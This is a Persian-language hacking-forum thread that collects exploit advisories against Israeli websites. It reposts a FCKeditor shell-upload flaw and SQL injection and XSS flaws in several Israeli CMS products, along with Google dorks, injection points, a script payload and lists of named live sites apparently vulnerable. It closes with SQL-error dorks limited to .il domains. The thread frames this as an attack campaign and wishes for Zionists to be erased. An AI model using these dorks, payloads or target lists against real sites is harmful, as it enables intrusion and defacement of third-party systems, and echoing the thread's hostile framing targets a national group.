ts icon
سرور تیم اسپیک گاردایران

پست های پیشنهاد شده

51139289453949924826.jpg

 

 

سلام خدمت عزیزان گارد ایران.خوب دوستان,من در این تاپییک قصد دارم که به همراه شما باگهای سایت های اسراییلی رو بررسی کنم.

امیدوارم از آموزش ها نهایت و بهره و ببرین.

به امید روزی که صهیونیست و استکبار و ظالم از صفحه روزگار محو شوند.

 

یا حق

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

نکته:برخی از باگها توسط گروه های امنیتی دیگر کشف شده اند ولی به دلیل اهمیتی که دارند من قرار میدم.

 

Wordocs Israel FCKeditor Shell Upload

---------------------------------------------------------------- 
Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities 
---------------------------------------------------------------- 
  
# Exploit Title: Wordocs Israel FCKeditor Shell Upload Disclosure 
Vulnerabilities 
# Google Dork: inurl:/files/wordocs/ site:il 
# Application Name: [Wordocs Israel] 
# Date: 2012-09-04 
# Author: BHG Security Center 
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/ 
# Version: [ 0.4.1.16 ] 
# Impact : [ High ] 
# Tested on: [linux+apache] 
# CVE : Webapps 
# Finder(s): 
    - Net.Edit0r (Net.Edit0r [at] att [dot] net) 
  
# Note: Please note there is a vulnerability in the site of 
non-Israeli 
# Description: : You can directly upload your shellcode and use server 
  
+-----------------------+ 
| Shellcode Upload      | 
+-----------------------+ 
  
The vulnerable code is located in 
/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
Proof of Concept: 
----------------- 
  
~ PoC : http://localhost/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
  
  ~ File upload path : http://[Target]/files/wordocs/shell.php 
  
~~~~~~~~ Demo : 
http://facet-theory.org/FCKeditor/editor/plugins/uploadme/fck_uploadme.php 
  
~ Study of Vulnerability : http://www.mediafire.com/?qedv4dq6b4yfqcz 
  
  
[-] Disclosure timeline: 
  
[04/08/2011] - Vulnerabilities discovered 
[14/10/2011] - Others vulnerabilities discovered 
[15/10/2011] - Issues reported to http://black-hg.org 
[04/09/2012] - Public disclosure 
  
  
# Greets To : 
  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t 
  
~ Mr.XHat  THANKS TO ALL Iranian HackerZ  ./Persian Gulf 
  
===========================================[End]=============================================  

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Binamic Web Design Israel SQL Injection

# Exploit Title: Binamic Web Design Israel SQL Injection Vulnerability 
# Date: 28/09/2011 - 20:38 
# Author: 3spi0n 
# Software Link: http://www.binamica.co.il/ 
# Tested On: BackTrack 5 - Win7 Ultimate 
# Platform: Php 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
  
[$] Dorks: "intext:"Developed by Binamica"" 
  
[$] Demo Sites: 
  
[~] http://www.givot.co.il/english/article.php?id=114" [PhpSQLi] 
[~] http://www.hebron.com/english/article.php?id=725" [PhpSQLi] 
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
# We attempted to work, you can not imagine. 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
# Contact: Http://3spi0n.Net/ 
# Greetz: Http://DarkDevilz.in/ 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
Mr.PaPaRoSSe  Black_Umo  ALEXTRAX  Brs_BaRoN  ZyX  x-Leader 
L4NETLY  DARKCOD3R  Santiq0  53rh4t  PerS 
  
[And DD'z Family] 
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY] 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Priza Israel CMS 0.0.2 Cross Site Scripting / SQL Injection

# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability 
# Date: 2012-01-05 [GMT +7] 
# Author: BHG Security Center 
# Software Link: http://www.priza.co.il/ 
# Vendor Response(s): They didn't respond to the emails. 
# Dork: intext:"Powered by Priza" 
# Version : [0.0.2] 
# Tested on: ubuntu 11.04 
# CVE : - 
# Finder(s): 
    - Net.Edit0r (Net.edit0r [at] att [dot] net) 
  - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com) 
  
----------------------------------------------------------------------------------------- 
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability 
----------------------------------------------------------------------------------------- 
  
Author : BHG Security Center 
Date : 2012-01-05 
Location : Iran 
Web : http://Black-Hg.Org 
Critical Lvl : Medium 
Where : From Remote 
My Group : Black Hat Group #BHG 
--------------------------------------------------------------------------- 
  
PoC/Exploit: 
~~~~~~~~~~ 
  
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi] 
  
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi] 
  
~ [PoC] ~: /website_path/volumes.asp?id=18 
  
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss] 
  
~~~~~~~~ Exploit 
  
~ [PoC] ~: Http://[victim]/path/index.asp?p_id=201&id=[SQLi] 
  
~ [PoC] ~: Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script> 
  
  
Demo URL: 
~~~~~~~~~ 
  
~~~~~~~ SQL Injection Demo 
  
- http://www.dinablich.co.il/website_en/index.asp?p_id=201&id=24' 
  
- http://www.jerusalem-crown.co.il/website_en/index.asp?page_id=7' 
  
- http://partialanswers.huji.ac.il/volumes.asp?id=18' 
  
~~~~~~~ XSS Demo 
  
- http://www.telad-mobile.com/website/index.asp?action=find&page_id=28&string="><script>alert(0)</script> 
  
 Timeline: 
~~~~~~~~~ 
- 02 - 01 - 2012 bug found. 
- 03 - 01 - 2012 vendor contacted, but no response. 
- 05 - 01 - 2012 Advisories release. 
  
 Important Notes: 
~~~~~~~~~ 
  
- Vendor did not respond to the email as well as the phone. As there 
is not any contact form or email address in 
  
- the website, we have used all the emails which had been found by 
searching in Google such as support, info, and so on. 
  
--------------------------------------------------------------------------- 
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper 
  
Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz 
  
[!] Persian Gulf 4 Ever 
[!] I Love Iran And All Iranian People 
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ 
-------------------------------- [ EOF ] ---------------------------------- 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
 

Telerom CMS SQLi Vulnerability

 



Telerom CMS SQLi Vulnerability

Software : Telerom
Date : 2/17/2012
Vendor : http://www.telerom.co.il
Language : ASP
Dork : "Powered By Telerom"
Author : ITTIHACK
Home : http://ittihack.com


Vulnerable File: index.asp

Exploit:
http://target/index.asp?id=[SQLi]

Demo :
http://telerom.co.il/index.asp?id=1' <-- Software Developer
http://ramla.muni.il/index.asp?id=1
http://sgocr.org.il/index.asp?id=1'
http://zy1882.co.il/index.asp?id=1'
http://morimonopol.org.il/index.asp?id=1'
http://provigil.co.il/index.asp?id=1'
http://mmnetanya.co.il/index.asp?id=1'


May allah have mercy on the martyrs of Syria

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

(Binamic Web Design Israel ( XSS

# Exploit Title: Binamic Web Design Israel ( XSS) 
# Author: Ayastar 
# Software Link: http://www.binamica.co.il/ 
# Category : [ webapps ] 
# Google dork: intext:"Developed by Binamica" 
# 
# 
#[eXPLOIT] 
#HTTP://localhost/path/article.php?operation=print&id=[XSS] 
#HTTP://localhost/path/articles.php?type=[XSS] 
# 
# 
#E-mail : Dmx-ayastar@hotmail.fr 
#From morocco 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

این هم تعدادی دورک جدید از سایت های اسراییلی

 intext:"error in your SQL syntax" +site:il 
    intext:"mysql_num_rows()" +site:il 
    intext:"mysql_fetch_array()" +site:il 
    intext:"Error Occurred While Processing Request" +site:il 
    intext:"Server Error in '/' Application" +site:il 
    intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il 
    intext:"Invalid Querystring" +site:il 
    intext:"OLE DB Provider for ODBC" +site:il 
    intext:"VBScript Runtime" +site:il 
    intext:"ADODB.Field" +site:il 
    intext:"BOF or EOF" +site:il 
    intext:"ADODB.Command" +site:il 
    intext:"JET Database" +site:il 
    intext:"mysql_fetch_row()" +site:il 
    intext:"Syntax error" +site:il 
    intext:"include()" +site:il   
    intext:"mysql_fetch_assoc()" +site:il 
    intext:"mysql_fetch_object()" +site:il 
    intext:"mysql_numrows()" +site:il 
    intext:"GetArray()" +site:il 
    intext:"FetchRow()" +site:il 
    intext:"Input string was not in a correct format" +site:il  

منبع دورکها:irist.ir

 

به امید پیروزی انقلاب اسلامی.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری